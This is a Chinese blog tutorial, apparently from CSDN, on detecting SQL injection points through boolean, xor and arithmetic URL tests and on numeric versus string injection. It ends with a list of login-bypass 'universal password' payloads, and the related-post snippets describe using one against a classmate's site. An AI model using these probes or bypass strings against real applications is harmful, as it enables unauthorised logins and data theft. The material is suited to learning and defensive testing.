SQL注入点判断及万能密码

已于 2022-04-10 13:18:44 修改
阅读量2.9k 收藏 14
点赞数
文章标签: sql
于 2022-04-10 13:18:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/124076314
版权

目录

SQL注入漏洞的类型

1.数字型判断

2.字符型判断 

SQL注入--万能密码

SQL注入漏洞的类型

1.单引号判断

http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。

2.and判断
    http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页
    http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。

3.Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
    http://www.xxx.com/xxx.asp?id=10'or 1=1
    http://www.xxx.com/xxx.asp?id=10'or 1=2

4.xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)
    http://www.xxx.com/xxx.asp?id=10'xor 1=1
    http://www.xxx.com/xxx.asp?id=10'xor 1=2

5.加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)
    http://www.xxx.com/xxx.asp?id=10-0
    http://www.xxx.com/xxx.asp?id=10-1
    http://www.xxx.com/xxx.asp?id=10+1

        and,or,xor等判断可以参考这三种逻辑运算的规律进行理解

sql注入漏洞通常为2种

  • 数字型
  • 字符型

1.数字型判断

        当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下:select * from <表名> where id = x这种类型可以使用经典的 and 1=1 和 and 1=2 来判断:

  • Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
  • Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

我们输入的是 x and 1=1 和x and 1=2

语句就是这样:

select* from …… where id=x and 1=1

select* from …… where id=x and 1=2

and左边的x是返回成功的,因为如果不存在后面也没法进行,而1=1是成立的,所以页面运行正常。如果是1=2,不成立,同时and语句的判断逻辑是只要有一个不成立,就返回失败,所以运行错误。

2.字符型判断 

        当输入的参 x 为字符型时,通常 abc.php 中 SQL 语句类型大致如下:select * from <表名> where id = 'x'这种类型我们同样可以使用 and ‘1’='1 和 and ‘1’='2来判断。

这里就使上面的数字型变为了字符型

而语句则是

select * from <表名> where id = 'x' and ‘1’='1'

这时候sql已经闭合了

还是一样的,这里and的左边是一定成立的,而and右边也是一样的成立,所以and逻辑之后,整个语句返回成功
同理可知如果后面是1'='2就会返回失败,而且这里不一定非要是1或者2,因为是字符型,所以我们可以输入任何字符,如a'='a,a'='b

SQL注入--万能密码

万能密码类似形式 

“or"a”="a
')or(‘a’='a
")or(“a”="a
‘or 1=1–
“or 1=1–
'or”=’
'or 1=1%00
'or 1=1/
admin’ or 1=1/*

S@Kura
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2188
id和万能密码
万能密码sql注入
hk_hkl的博客
07-17 6111
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特来进行非法登录的。当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
SQL注入常见类型及注入判断
qq_64395221的博客
05-15 808
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入。
SQL注入(绕过)
嚴 帅的博客
04-30 933
由于Web注入危害比较大,各种防御技术也会应用而生;程序员在写代码的时候会有意识地进行防御设置或者安全测试来封堵Web注入,但是想要绝对的安全,是比较难实现的。针对黑名单过滤技术,绕过的基本思路就是找到一种可替换的符号或者可替换的逻辑语句(来实现SQL注入);对于白名单技术,虽然实现了安全性,但是可能会阻挡一些客户端的合法流量,白名单技术一般用在一些形式固定场景。大多数Web网站还是会使用黑名单技...
万能密码或账号登录语句
weixin_44257023的博客
03-29 2570
账号输入: a or true #密码随便输入,比如: 123456。密码随便输入,比如:123456。用户名输入: admin’ #
SQL注入万能密码登录
山兔的博客
10-26 4119
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
Sqli-labs——lesson25(联合查询和报错注入,附各种sql万能密码
weixin_62281892的博客
07-12 890
25
SQL注入万能密码.docx
06-04
什么是sql注入万能密码?用的语法是什么?用万能密码可以判断网站是否存在注入漏洞,在渗透测试中非常有用
计算机病毒与防护:SQL注入原理.ppt
06-10
SQL注入的危害-绕过登录 某高校招聘录入系统登录框存在SQL注入漏洞: SQL注入的危害-数据盗取 智慧医疗安全之云信医疗主站存在SQL注入漏洞,涉及近500W+用户数据: SQL注入的分类 SQL注入测试方法 判断注入漏洞的...
SQL注入语句实例演示和解释.rar
05-10
在这个"SQL注入语句实例演示和解释"的压缩包中,主要包含了一个名为"SQL注入语句.doc"的文档,我们可以通过这个文档深入理解SQL注入的工作原理、常见类型以及防范措施。 首先,SQL注入的基本原理是,当用户通过表单...
渗透测试及攻防演练PDF.pdf
09-09
注入包括SQL注入万能密码之类的sql注入,上传可以直接得到WEBSHELL,危害等级高。 内网渗透测试也非常重要,需要获取管理员的hash、密码、ftp管理工具等信息,进行内网其他机器的登陆尝试。 渗透测试流程包括...
整理asp漏洞与入侵方式.doc
01-15
0x81 万能密码 7 0x82 登陆框注入 7 0x90 注入攻击 7 0xA0后台功能利用 8 0xA1 配置文件插马 8 0xA2 数据库备份 8 0xA3 后台中的上传页面 8 0xA4目录遍历与任意文件下载 9 0xA5 利用SQL执行功能导出SHELL 9 0xA6 ...
SQL注入原理——万能密码注入
WQ_762的博客
08-06 4780
万能密码】的原理 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Selectuser id,user type,email From users Where user id=’用户名’ And password=’密码’】 由于网站后台在进行数据库查询的时候没有对单引号进行过滤...
网络安全——sql注入判断
W981113的博客
01-03 3785
?可以传递参数 sql数值型注入 1.判断注入 ​ 数值型注入: ?id=1 and 1=1 , ?id=1 and 1=2 ​ 语句:select * from 表名 where id=1 and 1/2 2.猜字段数(二分法) ​ ?id=1 order by x 3.确定显示位 ​ ?id=-1 union select 1,2,3,4 --
万能密码诠释SQL注入
m0_58231750的博客
03-15 944
确实,随着服务器性能的进一步提升,在如今的现实情况下,基本上日常常用的网站,都已经把防sql注入做得很好了,但没有绝对安全的代码,保持警惕还是很有必要的,而且很多小网站,由于运营方资金精力等原因,往往对于网站的防护做得并没有那么好,就存在注入漏洞。,直接把客户端发来的请求数据包中的内容转化成一段sql语句,然后发送给数据库服务器,数据库服务器根据web服务器发来的sql语句,也。,直接执行并把执行结果反馈给web服务器,web服务器收到数据库服务器反馈的内容后,没有做过滤,
SQL注入详解
m0_67391121的博客
07-28 3447
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
SQL注入类型(详细讲解)
diaobusi的博客
10-27 831
在进行SQL注入测试的时候,确实很重要要知道目标SQL语句是什么类型,因为不同类型的SQL语句对注入的有效载荷(payload)有不同的语法要求。
SQL注入
輚至消亡
01-19 8624
0. PHPStorm代码调试方法 加上&XDEBUG_SESSION_START=PHPSTORM即可 1. 联合查询注入 利用前提: 页面上有显示位 优: 方便快捷, 易于利用 缺: 需要显示位 细分: 字符型注入 实践一下: 成功注入: 可以构造如下来判定是否存在字符型注入: 整型注入 实践一下: 成功 联合注入利用order by和group by判断表的列数 order by后面是可以接列号的,比如以第一列排序...
万能密码:‘or 1=1-- 实战SQL注入,秒破后台
热门推荐
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL注入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
渗透sql注入万能密码
最新发布
06-13
"万能密码"这一说法通常不适用于SQL注入,因为每种数据库和系统都有其特定的语法和安全机制。 在SQL注入中,攻击者通常会尝试输入恶意的SQL代码,意图绕过应用程序的输入验证,让数据库执行他们想要的操作,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值